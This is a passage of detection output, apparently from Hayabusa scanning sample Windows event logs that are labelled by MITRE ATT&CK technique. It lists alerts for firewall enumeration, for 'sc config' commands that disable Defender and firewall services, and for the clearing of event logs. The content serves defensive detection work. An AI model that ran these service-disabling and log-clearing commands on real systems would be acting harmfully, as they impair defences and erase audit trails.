(PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$x = $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""]; if ($x -ne $null -and $x.Value -ne $null -and $x.Value.ToString().Equals(""0"")) { ""NotConfigured""; } else { $x.Value }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) if ($x.ToUpperInvariant().Equals(""NOTCONFIGURED"")) { $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""].Value = 0; } else { $this.PSBase.CimInstanceProperties[""MaxSAIdleTimeSeconds""].Value = [uint32]$x; }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding]($this.PSBase.CimInstanceProperties['KeyEncoding'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['KeyEncoding'].Value = 
[System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing]($this.PSBase.CimInstanceProperties['EnablePacketQueuing'].Value + 0),rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnablePacketQueuing'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing]$x,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallSetting): ""Get-NetFirewallSetting"" ParameterBinding(Get-NetFirewallSetting): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallSetting): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallSetting): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallSetting): name=""AsJob""; 
value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetSecuritySettingData (InstanceID = ""MSFT?GlobalIPSecSettingData"")""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:13.864 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:57:04.361 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config sense start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0xe58 | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx +2021-10-25 07:57:05.977 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config mpssvc start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2ebc | User: admmig | LID: 
0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx +2021-10-25 07:57:08.463 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config WinDefend start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2e40 | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx +2021-10-25 18:04:24.089 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Clear-EventLog -LogName application, system -confirm",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx +2021-10-25 18:04:30.334 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:04:30.334 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Clear-EventLog): ""Clear-EventLog"" ParameterBinding(Clear-EventLog): name=""LogName""; value=""application, system"" ParameterBinding(Clear-EventLog): name=""Confirm""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx +2021-10-25 18:04:30.334 
+00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx +2021-10-25 18:04:30.350 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID800-4103-4104-Clear event log attempt.evtx +2021-10-25 18:09:51.875 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.002 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.080 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.095 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.127 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.142 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.215 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.293 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.340 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.355 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.418 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 
+2021-10-25 18:11:09.480 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.527 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.574 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.591 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.606 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.638 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.653 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.669 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.747 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.778 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.794 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.841 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.856 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 
+2021-10-25 18:11:09.888 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.903 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.950 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:09.997 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.028 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.044 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.059 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.075 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.106 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.138 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.184 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.200 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.216 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 
+2021-10-25 18:11:10.231 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.263 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.294 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.309 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.325 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.341 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.356 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.403 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.419 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.434 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.450 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.481 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.481 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 
+2021-10-25 18:11:10.497 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.528 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.747 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.763 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.778 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.794 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.809 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.856 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.934 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:10.997 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.028 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.091 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:11:11.106 +00:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 
